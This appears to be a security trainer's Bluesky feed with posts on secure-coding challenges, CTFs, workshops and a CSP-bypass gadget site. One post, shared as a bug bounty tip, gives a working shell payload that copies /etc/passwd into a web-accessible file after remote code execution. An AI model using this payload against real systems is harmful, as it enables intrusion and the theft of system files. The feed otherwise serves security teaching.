Adam Langley
buildhacksecure.bsky.social
Fullstack dev & Hacker, training ethical hackers how to hack & web devs to secure their apps! CTO at https://hackinghub.io and Director at https://bsidesexeter.co.uk
Secure Coding Challenge…

What is insecure about this code? And how would you extract a file? For example /etc/passwd
February 3, 2025 at 11:25 PM
Reposted by Adam Langley
If it doesn't work, it's always DNS you know. I created a challenge around this nightmare that will be kindly hosted by @hackinghub.bsky.social starting today at 18:00 UTC. Thanks @buildhacksecure.bsky.social for the kind hospitality.
January 15, 2025 at 5:56 PM
Got an RCE in a background process with no outbound network so you need to exfil to webroot without knowing the location?

All you need to know is a unique filename in the webroot.

$( cat /etc/passwd > $(find / -name uniquefile.png 2>/dev/null).txt )

#bugbountytips #hacking
January 9, 2025 at 11:21 AM
Merry Christmas!
December 25, 2024 at 7:36 AM
I don't know how I feel about AI. As a dev for 20+ yrs, I love coding, creating, solving puzzles. AI saves time & makes sense for business, but is it sucking the joy out of it? Are we all just becoming prompt engineers? Maybe I'm just an old man shouting at clouds...
December 20, 2024 at 12:16 PM
Reposted by Adam Langley
Adam has the rare ability to turn seemingly simple situations into opportunities for reflection or learning.
December 10, 2024 at 7:37 PM
Okay, I have a toxic CTF challenge idea.... Should I do it? Operation "Merry ToxMas"
December 9, 2024 at 10:21 AM
2 Hours in and weirdly not tired. Just covered our SQL Injection module.
Hosting a workshop with @nahamsec.bsky.social remotely in Aus from 10pm to 1:30am for YowConf! Come on coffee!!!
December 4, 2024 at 12:01 AM
Hosting a workshop with @nahamsec.bsky.social remotely in Aus from 10pm to 1:30am for YowConf! Come on coffee!!!
December 4, 2024 at 12:00 AM
Reposted by Adam Langley
Hey BlueSky!

In case you missed it:

I've created cspbypass.com
A site where you can search for known CSP bypass gadgets to gain XSS.

It already contains a bunch of useful gadgets with contributions from your favourite hackers.

If you have some CSP bypasses to share, feel free to contribute!
November 14, 2024 at 2:57 PM
I'm delivering a talk about web app security (or the lack of it) in web apps and also delivering a workshop in Melbourne, Brisbane and Sydney at the start of December! See yowcon.com for more detail.
November 15, 2024 at 4:33 PM
Hoping I prefer this platform a little more :) Give us a follow if you're into web app security or web development #webdev #hacking #ethicalhacker #php
November 14, 2024 at 9:07 AM